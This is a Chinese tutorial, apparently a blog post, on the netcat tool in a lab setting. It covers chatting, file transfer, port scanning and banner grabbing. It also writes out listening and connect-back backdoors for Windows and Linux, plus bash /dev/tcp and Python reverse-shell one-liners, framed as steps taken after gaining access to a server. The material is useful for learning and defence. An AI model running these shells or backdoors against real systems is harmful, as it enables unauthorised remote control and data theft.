网络瑞士军刀netcat

netcat是什么?

Netcat是一款非常出名的网络工具,有瑞士军刀之称。它虽然体积小,但是在网络中无比强大,它可以用作端口监听、端口扫描、远程文件传输、还可以实现远程shell等功能。
在这里插入图片描述

如何下载

kali自带netcat,直接使用即可,windows下载
链接:https://pan.baidu.com/s/1MmAStRA2WCfQ5arR4HBsHQ
提取码:zjvj
下载压缩包后解压即可(32位和64位分清使用)

本次实验中windows的ip为192.168.1.218
kali的ip为192.168.65.132

nc的控制参数

参数简介
-l设置nc处于监状态,此时nc当做服务端,监听并等待连接
-L和-l相似,当客户端断开时,服务端回到等待状态
-p设置监听端口
-unc使用UDP协议,默认使用TCP协议
-w后面跟数字,超时断开
-z表示zero,扫描时不发送任何数据,加快扫描速度
-n设置nc只识别ip地址,不进行dns解析
-v输出交互或出错信息
-s指定发送数据的源ip,适用于多网卡机
-d脱离命令窗口,在后台运行(关闭终端,仍可运行)
-e执行某个程序
-i设置发送每行数据的时间间隔

可使用nc -h查看帮助信息:
在这里插入图片描述

基本使用

1、通信

服务端开启监听:nc -l -p localport
客户端连接: nc remoteip remoteport
此时两台机器可进行简单通信功能
在这里插入图片描述

2、文件传输

为什么可以直接利用nc进行文件传输?

nc中的数据传输,使用的是标准的输入、输出流,所以可以直接利用命令来进行操作。

文件传输的使用场景

1、取证:当目标机器被黑客攻击后,取证人员可以利用nc的文件传输功能来获取目标机器的文件内容,避免直接在目标机器上进行操作造成取证的误差。
2、单纯获取目标机敏感文件,当目标机上有的文件内容无法正常下载,可以使用nc进行文件的传输。

客户端发送文件给服务端

服务端:nc -l -p localport > acceptfile
客户端: nc remoteip remoteport < sendfile
在这里插入图片描述

服务端发送文件给客户端

服务端:nc -l -p localport < sendfile
客户端: nc remoteip remoteport > acceptfile
在这里插入图片描述

3、信息探测

信息探测的使用场景

1、目标内网的扫描
当获取目标权限之后,如果目标没有任何途径可以对内网进行探测,但此时有一个nc,就可以使用nc对内网的ip和端口进行扫描。
2、当手头没有探测工具时,可以使用nc进行端口探测
3、对目标的服务banner进行抓取,通过nc对目标端口进行探测。

端口扫描

nc -n -v -w1 -z target_ip start_target_port- stop_target_port
在这里插入图片描述

Banner抓取

echo " "| nc -v -n -w1 target_ip start_target_port- stop_target_port
在这里插入图片描述

4、建立后门

建立后门的使用场景

当目标机器上有nc时,可以使用nc来建立后门,实现执行目标命令的功能。

windows监听型后门

有客户端连接该端口时,返回cmd给客户端 nc -l -p port -e cmd.exe
出现乱码,输入chcp 65001 消除乱码
服务端: nc -l -p 9999 -e cmd.exe
客户端:nc64.exe 192.168.1.218 9999
此时客户端获取服务端cmd
在这里插入图片描述

windows连接型后门

连接的客户端返回给服务器cmd nc ip port -e cmd.exe
服务端: nc -l -p 9999
客户端:nc64.exe 192.168.65.132 9999 -e cmd.exe
此时客户端将cmd.exe发给服务端,服务端可以使用cmd命令
在这里插入图片描述

linux监听型后门

nc -l -p port -e /bin/bash
服务端: nc -l -p 9999 -e /bin/bash
客户端:nc64.exe 192.168.65.132 9999
在这里插入图片描述

linux连接型后门

nc ip port -e /bin/bash
服务端: nc64.exe -l -p 9999
客户端:nc 192.168.1.218 9999 -e /bin/bash
在这里插入图片描述

5、连接转发

在这里插入图片描述
现需要kali1和kali2互通,解决方法:
1、kali2开启监听: nc -l -p 9999
2、windows 开启监听: nc64.exe -l -p 9998 -e qwe.bat
其中qwe.bat的文件内容为: nc64.exe 192.168.65.132 9999
3、kali1连接windows,执行qwe.bat,再次连接kali2,此时kali1和kali2建立连接,可以发送请求。

6、反弹shell

bash

场景:拿到某服务器权限,想反弹shell,但服务器未安装nc。
反弹shell命令: bash -i >& /dev/tcp/ip/port 0>&1
接受命令: nc -lvp port
在这里插入图片描述

在这里插入图片描述

python

场景:拿到某服务器权限,想反弹shell。服务器未安装nc,但安装了python。

反弹shell命令:
import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);
接受命令:  nc -lvp port

在这里插入图片描述

在这里插入图片描述

bash

场景:拿到某服务器权限,想反弹shell。服务器不支持-e参数。
反弹shell命令: nc ip port | /bin/bash | nc ip port
接受命令(开启两个监听端口): nc -lvp port1 nc -lvp port1
完成后在port1输入命令,port2执行并返回结果
演示图

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值